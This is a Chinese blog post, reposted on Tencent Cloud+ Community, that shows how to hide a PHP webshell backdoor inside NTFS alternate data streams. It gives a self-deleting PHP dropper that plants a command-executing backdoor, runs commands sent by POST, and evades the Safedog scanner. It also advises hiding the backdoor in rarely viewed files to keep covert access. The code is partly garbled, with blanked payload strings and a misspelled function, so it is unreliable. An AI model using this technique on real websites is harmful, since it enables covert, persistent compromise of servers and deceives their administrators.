NTFS歪计

2018/8/10/11:20

前言

在《NTFS歪计(上篇)》中,我们简要的知道了NTFS文件系统的一些特性。

在本篇,笔者会介绍如何利用这样的特性隐藏后门。

webshell后门

exec('echo "">>index.php:key.php');

#把一句话写进首页文件的a.php

$key =

echo "">>a.php

key;

exec($key);

#文件包含,直接去包含文件流

$url = $_SERVER['PHP_SELF'];

$filename = substr($url,strrops($url,'/')+1);

@unlink($filename);

# 自己删掉自己

?>

将上述代码写成key.php文件上传。

然后让其之执行,如下:

(虽然有报错,但是该执行的都执行了)

可以发现网站目录中多了a.php,没了之前上传的key.php了。

回到黑客视角:

携带上post的key数据:

我们会发现,此时的后门可执行,且对站长有一定的隐蔽性。

注意一下,在此例中,a.php只是代表某些站长不常看的一些php文件。

如:

网站有很多目录,一定有一些目录,如ba_pwd_attacks_1.php等等比较长的php文件,我们可以将a.php的内容echo进去,从而及时转移自己的后门

一般安全狗的静态扫描不会闻到这种隐藏的后门。

  • 发表于:
  • 原文链接:https://kuaibao.qq.com/s/20180810G0RU6500?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券